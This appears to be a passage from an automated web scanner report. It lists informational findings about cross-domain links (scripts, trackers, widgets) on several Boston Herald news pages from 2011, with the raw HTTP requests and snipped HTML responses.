<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Finternational%2Fafrica%2Fview.bg%3Farticleid%3D1312633%26srvc%3Drss%26utm_source%3Dfeedburner%26utm_medium%3Dfeed%26utm_campaign%3DFeed%253A%2Bbostonherald%252Fnews%2B%2528News%2B%2526%2BOpinion%2B-%2BBostonHerald.com%2529&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Egyptian President Mubarak asks Cabinet to resign');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</p>
<iframe src="http://widget.newsinc.com/single.htm?WID=2&VID=23316506&freewheel=90017&sitesection=bostonherald" height=320 width=425 frameborder=no scrolling=no noresize marginwidth=0px marginheight=0px></iframe>
...[SNIP]...
<a href="/news/international/africa/view.bg?articleid=1312633&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(24) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/097956_ltpEgyptC012811.jpg" alt="An anti-government protester burns..." /></div>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="President Obama tells Mubarak: Must take ‘concrete steps" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.281. http://www.bostonherald.com/news/national/general/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/national/general/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/national/general/view.bg?articleid=1312579

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fnational%2Fgeneral%2Fview.bg%3Farticleid%3D1312579%26srvc%3Dnext_article&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/national/general/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110125/stp/bb1497_ltpmkelly.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5dffd7_ltpchallenger.jpg
http://multimedia.heraldinteractive.com/images/20110128/62fc53_rreagan012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/da98aa_Shuttle_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widget.newsinc.com/single.htm?WID=2&VID=23316276&freewheel=90017&sitesection=bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/national/general/view.bg?articleid=1312579 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fnational%2Fgeneral%2Fview.bg%3Farticleid%3D1312579%26srvc%3Dnext_article&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Ronald Reagan’s memorable speech on Challenger disaster');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<div id="articleFull" class="articleFull"><iframe src="http://widget.newsinc.com/single.htm?WID=2&VID=23316276&freewheel=90017&sitesection=bostonherald" height=320 width=425 frameborder=no scrolling=no noresize marginwidth=0px marginheight=0px></iframe>
...[SNIP]...
<a href="/news/national/general/view.bg?articleid=1312579&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(6) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/62fc53_rreagan012811.jpg" alt="his Jan. 28, 1986 file picture shows..." /></div>
...[SNIP]...
<a href="/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/da98aa_Shuttle_01282011.jpg" alt="Remembering the Challenger’s haunting explosion" /></a>
...[SNIP]...
<a href="/news/national/general/view/20110127challenger_25_years_later_a_still_painful_wound/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5dffd7_ltpchallenger.jpg" alt="Challenger: 25 years later, a still painful wound" /></a>
...[SNIP]...
<a href="/news/national/general/view/20110125giffords_husband_weighing_decision_on_shuttle/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/bb1497_ltpmkelly.jpg" alt="Gifford’s husband weighing decision on shuttle" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.282. http://www.bostonherald.com/news/offbeat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/offbeat/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/offbeat/?srvc=home&position=recent

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Foffbeat%2F%3Fsrvc%3Dnews%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/offbeat/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://img.video.ap.org/p/j/apovn.js
http://multimedia.heraldinteractive.com/images/20110115/stp/3f0a52_legos01162011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/41ffa0_ltpPianoBay012511.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/5a4b42_pack.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/5a9493_hawk.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/offbeat/?srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:33:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 53871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Offbeat News - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/offbeat/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Foffbeat%2F%3Fsrvc%3Dnews%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.283. http://www.bostonherald.com/news/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/politics/?srvc=home&position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/5e6415_jperry012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/politics/?srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
